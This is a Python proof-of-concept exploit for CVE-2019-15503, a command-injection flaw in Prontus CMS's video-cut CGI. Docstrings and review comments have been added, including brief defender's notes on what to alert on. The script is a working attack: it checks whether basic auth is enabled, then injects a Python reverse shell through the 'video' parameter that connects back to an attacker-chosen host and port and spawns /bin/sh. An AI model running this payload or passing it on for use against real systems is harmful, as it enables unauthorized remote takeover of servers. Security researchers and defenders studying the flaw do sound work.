#!/usr/bin/python3
# CVE-2019-15503
# isra
import argparse
import requests
def exec_rce(host: str, prontus_id: str, rhost: str, rport: str) -> None:
    """Send the CVE-2019-15503 command-injection request to a Prontus CMS host.

    Args:
        host: base URL of the target (scheme + host, e.g. ``http://foo.bar``),
            used as the prefix of both request URLs.
        prontus_id: value interpolated into the ``prontus_id`` query parameter.
        rhost: address the injected shell connects back to.
        rport: port the injected shell connects back to. It arrives as a
            string from argparse and is only interpolated into the payload.

    Returns:
        None. Progress is printed; the function returns early, without
        sending the payload, when ``/cgi-cpn`` answers 401.

    Raises:
        requests.exceptions.RequestException: propagated unchanged from
            either ``requests.get`` call. No ``timeout`` is passed, so an
            unresponsive host blocks the call indefinitely.

    Defender's notes: the injection point is the ``video`` parameter of
    ``/cgi-cpn/xcoding/prontus_videocut.cgi``; a ``;`` inside that value
    separates the attacker-supplied command from the expected media path.
    A request to that CGI whose ``video`` value contains ``;`` is the
    signal to alert on, and requiring authentication on ``/cgi-cpn`` is
    already enough to make this script abort (see the 401 check below).
    """
    # check first if /cgi-cpn is basic auth protected
    url_cgi = "{}/cgi-cpn".format(host)
    print("[*] Checking if basic auth is enabled.")
    req = requests.get(url_cgi)
    # Only a 401 aborts. Any other status (403, 404, 5xx, a redirect to a
    # login page) falls through and the payload is sent anyway.
    if(req.status_code == 401):
        print("[*] Basic auth enabled. Aborting...")
        return
    print("[*] Basic auth disabled!")
    print("[*] Building RCE...")
    # build reverse shell
    # "%3D" is a percent-encoded "=". The command is spliced into the query
    # string without any encoding, so presumably a literal "=" would be
    # taken as a key/value separator by the CGI — hence the escape.
    cmd = "/usr/bin/python -c 'import socket,subprocess,os;s%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{}\",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p%3Dsubprocess.call([\"/bin/sh\",\"-i\"]);'".format(rhost, rport)
    # ``cmd`` sits between two ``;`` in the ``video`` parameter; the media
    # path after it keeps the rest of the query well-formed. ``prontus_id``
    # is interpolated unencoded as well.
    url_rce = "{}/cgi-cpn/xcoding/prontus_videocut.cgi?prontus_id={}&t1=1&t2=2&video=;{};/12345678/mmedia/multimedia_videoA123456.mpeg".format(host, prontus_id, cmd)
    print("[*] sending shell oOoOoOoOoOoOoO!!!")
    # send
    # NOTE(review): the response is assigned but never inspected, so a
    # request that was blocked, rejected or hit a patched CGI looks exactly
    # like a successful one from this function's output.
    req = requests.get(url_rce)
def main() -> None:
    """Parse the four positional CLI arguments, print a banner, call exec_rce.

    All four arguments are declared as required positionals, so argparse
    exits with a usage error when any is missing; the ``not args.*`` check
    below is therefore only reachable when an argument is explicitly passed
    as an empty string (``""``). ``rport`` is left as a string because no
    ``type=`` is given.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("host", help="target host (e.g. http://foo.bar)")
    parser.add_argument("prontus", help="target prontus ID (e.g. prontus_cms)")
    parser.add_argument("rhost", help="host for reverse shell")
    parser.add_argument("rport", help="port for reverse shell")
    args = parser.parse_args()
    # Effectively dead for missing arguments (argparse already exited);
    # only an empty-string argument lands here.
    if(not args.host or not args.prontus or not args.rhost or not args.rport):
        print("Missing arguments. Try '{} --help' for more information.".format(__file__))
    else:
        print("#"*80)
        print("\n\t ~=== Prontus CMS RCE PoC ===~")
        print("\t+ target host: {}".format(args.host))
        print("\t+ prontus ID: {}".format(args.prontus))
        print("\t+ reverse shell to {}:{}\n".format(args.rhost, args.rport))
        # Any requests exception raised inside exec_rce propagates out of
        # main() as a traceback; nothing here catches it.
        exec_rce(args.host, args.prontus, args.rhost, args.rport)
        print("#"*80)
# Script entry point: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()